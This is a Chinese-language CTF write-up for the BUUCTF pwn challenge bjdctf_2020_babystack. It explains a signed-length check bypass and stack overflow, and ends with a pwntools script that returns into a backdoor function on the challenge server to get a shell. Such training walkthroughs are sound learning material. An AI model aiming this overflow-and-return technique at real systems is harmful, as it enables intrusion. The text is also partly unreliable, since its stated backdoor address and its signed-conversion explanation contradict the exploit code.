BUUCTF-PWN-bjdctf_2020_babystack![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/6b8b8ba09319a1698b8bc2fc0de5c4d1.png)
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
64位程序,小端序
开启部分RELRO-----got表仍可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接
程序先让我们输入name的长度,之后又让我们输入一个name
ida一下看一下主函数
观察发现nbytes存放着我们输入的name的大小,之后又用read函数输入nbytes字节大小的字符给buf,看一下栈区
buf距离返回地址(r所在位置)0x18字节(0x10+0x8),我们需要让nbytes至少要大于0x18
再回到主函数,我们想if语句里的
这个if语句先把nbytes转换为有符号整形,再与10比较,如果我们把nbytes输入为10000001(无符号整形为0x81,有符号整形为1,1<10)就可以绕过if语句,执行read函数,覆盖返回地址,查看一下有没有后门函数
后门函数地址为0x400726
exp
from pwn import *
context(log_level = 'debug', os = 'linux', arch = 'amd64', endian = 'little')
sh = remote('node4.buuoj.cn',28656)
backdoor = 0x4006E6
sh.recvuntil('name:')
sh.sendline(b'129')
payload = flat(['a' * 0x18,backdoor])
sh.recvuntil("name?")
sh.sendline(payload)
sh.interactive()
运行获得shell